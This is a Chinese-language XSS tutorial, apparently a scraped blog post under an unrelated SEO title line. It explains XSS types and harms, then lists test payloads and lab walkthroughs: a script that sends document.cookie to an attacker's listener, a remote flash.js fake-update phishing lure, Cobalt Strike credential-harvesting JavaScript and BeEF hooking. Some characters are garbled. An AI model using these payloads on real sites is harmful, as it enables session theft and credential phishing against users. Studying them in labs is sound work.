pinterest wordpress廈門seo排名優(yōu)化方式
1.JavaScript
JavaScript 是一種腳本,一門編程語言,它可以在網(wǎng)頁上實(shí)現(xiàn)復(fù)雜的功能,網(wǎng)頁展現(xiàn)給你的不再是簡單的靜態(tài)信息,而是實(shí)時(shí)的內(nèi)容更新,交互式的地圖,2D/3D動(dòng)畫,滾動(dòng)播放的視頻等等。
(1)BOM
瀏覽器對(duì)象模型,JS通過BOM 訪問瀏覽器相關(guān)的信息,對(duì)瀏覽器進(jìn)行交互,獲取寬高,改變當(dāng)前窗口的地址。通常用來證明漏洞的存在,比如XSS漏洞。
(2)事件
不管什么語言,事件無處不在,事件是用戶與web頁面交互時(shí)發(fā)生的事情,例如單擊鏈接或按鈕、向輸入框或文本區(qū)輸入文本、在選擇框中進(jìn)行選擇、按鍵盤上的鍵、移動(dòng)鼠標(biāo)指針、提交表單等。在某些情況下,瀏覽器本身可以觸發(fā)事件,例如頁面加載和卸載事件
(3)事件處理程序
事件處理程序,事件就是用戶與瀏覽器交互后執(zhí)行的某種動(dòng)作,而響應(yīng)某個(gè)事件的函數(shù)叫做事件處理程序(事件偵聽器)。
按照慣例,事件處理程序的名稱總是以“on”開頭,因此單擊事件的事件處理程序稱為onclick,加載事件的事件處理程序稱為onload,模糊事件的事件處理程序稱為onblur等等。
2.跨站腳本攻擊漏洞
跨站腳本 (Cross-site scripting,簡稱XSS)是指惡意攻擊者往Web頁面里插入惡意代碼,當(dāng)受害者加載網(wǎng)站時(shí),代碼就會(huì)執(zhí)行。惡意代碼可以通過幾種方式插入。最常見的是添加到 URL 的末尾,或者直接發(fā)布到顯示用戶生成的內(nèi)容的頁面上。用更專業(yè)的術(shù)語來說,跨站腳本是一種客戶端代碼注入攻擊。
(1)危害
A.釣魚欺騙:最典型的就是利用目標(biāo)網(wǎng)站的反射型跨站腳本漏洞將目標(biāo)網(wǎng)站重定向到釣魚網(wǎng)站,或者注入釣魚 JavaScript 以監(jiān)控目標(biāo)網(wǎng)站的表單輸入,甚至發(fā)起基于 DHTML 更高級(jí)的釣魚攻擊方式。
B.網(wǎng)站掛馬:跨站時(shí)利用 IFrame 嵌入隱藏的惡意網(wǎng)站或者將被攻擊者定向到惡意網(wǎng)站上,或者彈出惡意網(wǎng)站窗口等方式都可以進(jìn)行掛馬攻擊。
C.身份盜用:Cookie 是用戶對(duì)于特定網(wǎng)站的身份驗(yàn)證標(biāo)志,XSS 可以盜取到用戶的 Cookie,從而利用該 Cookie 盜取用戶對(duì)該網(wǎng)站的操作權(quán)限。如果一個(gè)網(wǎng)站管理員用戶 Cookie 被竊取,將會(huì)對(duì)網(wǎng)站引發(fā)巨大的危害。
D.盜取網(wǎng)站用戶信息:當(dāng)能夠竊取到用戶 Cookie 從而獲取到用戶身份使,攻擊者可以獲取到用戶對(duì)網(wǎng)站的操作權(quán)限,從而查看用戶隱私信息。
E.垃圾信息發(fā)送:比如在 SNS 社區(qū)中,利用 XSS 漏洞借用被攻擊者的身份發(fā)送大量的垃圾信息給特定的目標(biāo)群。
F.劫持用戶 Web 行為:一些高級(jí)的 XSS 攻擊甚至可以劫持用戶的 Web 行為,監(jiān)視用戶的瀏覽歷史,發(fā)送與接收的數(shù)據(jù)等等。
G.XSS 蠕蟲:XSS 蠕蟲可以用來打廣告、刷流量、掛馬、惡作劇、破壞網(wǎng)上數(shù)據(jù)、實(shí)施 DDoS 攻擊等。
(2)分類
A.反射型XSS
反射型XSS,又稱非持久型XSS,攻擊相對(duì)于受害者而言是一次性的,具體表現(xiàn)在受害者點(diǎn)擊了含有的惡意JavaScript腳本的url,惡意代碼并沒有保存在目標(biāo)網(wǎng)站,而Web應(yīng)用程序只是不加處理的把該惡意腳本“反射”回受害者的瀏覽器而使受害者的瀏覽器執(zhí)行相應(yīng)的腳本
B.存儲(chǔ)型XSS
存儲(chǔ)型XSS是指應(yīng)用程序通過Web請(qǐng)求獲取不可信賴的數(shù)據(jù),在未檢驗(yàn)數(shù)據(jù)是否存在XSS代碼的情況下,便將其存入數(shù)據(jù)庫 當(dāng)下一次從數(shù)據(jù)庫中獲取該數(shù)據(jù)時(shí)程序也未對(duì)其進(jìn)行過濾,頁面再次執(zhí)行XSS代碼持續(xù)攻擊用戶。存儲(chǔ)型XSS漏洞大多出現(xiàn)在留言板、評(píng)論區(qū),用戶提交了包含XSS代碼的留言到數(shù)據(jù)庫,當(dāng)目標(biāo)用戶查詢留言時(shí),那些留言的內(nèi)容會(huì)從服務(wù)器解析之后加載出來。
C.DOM型
不與后臺(tái)服務(wù)器交互數(shù)據(jù),也屬于反射型的一種,一種通過dom操作前端輸出的時(shí)候產(chǎn)生問題DOM,全稱Document biect Model,是一個(gè)平臺(tái)和語言都中立的接口,可以使程序和腳本能夠動(dòng)態(tài)訪問和更新文檔的內(nèi)容、結(jié)構(gòu)以及樣式,DOM-XSS簡單理解就是不與后臺(tái)服務(wù)器產(chǎn)生數(shù)據(jù)交互,是一種通過DOM操作前端代碼輸出的時(shí)候產(chǎn)生的問題。
3.常見測試代碼
<input οnfοcus=write('xss') autofocus>
<img src οnerrοr=alert('xss')>
<svg οnlοad=alert('xss') >
<script>alert('xss')</script>
<a href="javascript:alert('xss')">clickme</a>
</td><script>alert(123456)</script>
'><script>alert(123456)</script>
"><script>alert(123456)</script>
</title><script>alert(123456)</script>
<scrip<script>t>alert(123456)</scrip</script>t>
</div><script>alert(123456)</script>
4.盜取cookie
(1)首先在公網(wǎng)服務(wù)器啟動(dòng)一個(gè)用于接收cookie的web服務(wù)
python3 -m http.server --bind 0.0.0.0 2333
(2)在xss漏洞的地方插入攻擊代碼
<script>
window.open('http://192.168.169.1:2333/?q='+btoa(document.cookie))
</script>
受害者視角:
受害者訪問了插入xss代碼的網(wǎng)頁,觸發(fā)了漏洞,在瀏覽器打開了一個(gè)新的網(wǎng)站,并將cookie發(fā)送的攻擊者的服務(wù)器
攻擊者視角:
啟動(dòng)的web服務(wù)器接收到了受害者瀏覽器發(fā)送的cookie請(qǐng)求
5.Flash釣魚
利用偽造的flash網(wǎng)站進(jìn)行釣魚,真?zhèn)尉W(wǎng)站之間除網(wǎng)址不同以外其他都相同
(1)拉取docker鏡像,修改index文件,將其改為php文件,并對(duì)flash.js文件進(jìn)行修改,將ip改為虛擬機(jī)ip,html文件改為php文件,再次注意絕對(duì)路徑問題
(2)向存在xss漏洞的地方插入攻擊代碼,注意ip地址和端口的更改
<script src="http://192.168.190.133:9957/flash.js"></script>
當(dāng)受害者訪問該網(wǎng)站后會(huì)有彈窗彈出,提醒當(dāng)前flash版本過低需要升級(jí)版本,當(dāng)我們點(diǎn)擊確定后即會(huì)跳轉(zhuǎn)到攻擊者偽造好的flash網(wǎng)站,點(diǎn)擊下載時(shí)便會(huì)執(zhí)行攻擊者注入的惡意文件
6.Cobalt Strike釣魚
一款團(tuán)隊(duì)作戰(zhàn)滲透測試神器
(1)下載cs,給予其執(zhí)行權(quán)限并啟動(dòng)服務(wù)器
主機(jī)即為虛擬機(jī)地址
(2)開始克隆
(3)通過短信釣魚,郵件釣魚,xss漏洞等方式將克隆好的網(wǎng)站發(fā)送給受害者
以下是克隆好后的網(wǎng)站
(4)將下面的js文件放入到網(wǎng)站目錄里
window.location.href后接我們自己克隆好的網(wǎng)站地址
window.alert = function(name){
????var iframe = document.createElement("IFRAME");
????iframe.style.display = "none";
????iframe.setAttribute("src",'date:text/plain');
????document.documentElement.appendChild(iframe);
????window.frames [0].window.alert(name);
????iframe.parentNode.removeChild(iframe);
}
alert("登陸過期,請(qǐng)重新登陸!");
window.location.href="http://192.168.190.134/"
啟動(dòng)監(jiān)聽端口
(5)受害者視角
以下是利用xss漏洞,向其中插入payload,用戶在訪問時(shí)會(huì)看到提示登錄過期,重新登錄,如若輸入用戶名和密碼,則會(huì)被攻擊者所截獲
(6)攻擊者視角
7.BEEF釣魚
(1)利用xss漏洞注入payload
將注入好漏洞的網(wǎng)站想辦法讓受害者點(diǎn)擊
(2)我們可以通過beef發(fā)送一些指令到受害者瀏覽器上
可以看到已經(jīng)控制了受害者瀏覽器
(3)受害者視角
8.流量劫持
利用木馬修改瀏覽器不停的彈出新的窗口強(qiáng)制性讓用戶訪問指定網(wǎng)站
例如在xss漏洞注入payload,自動(dòng)跳轉(zhuǎn)至百度
受害者視角: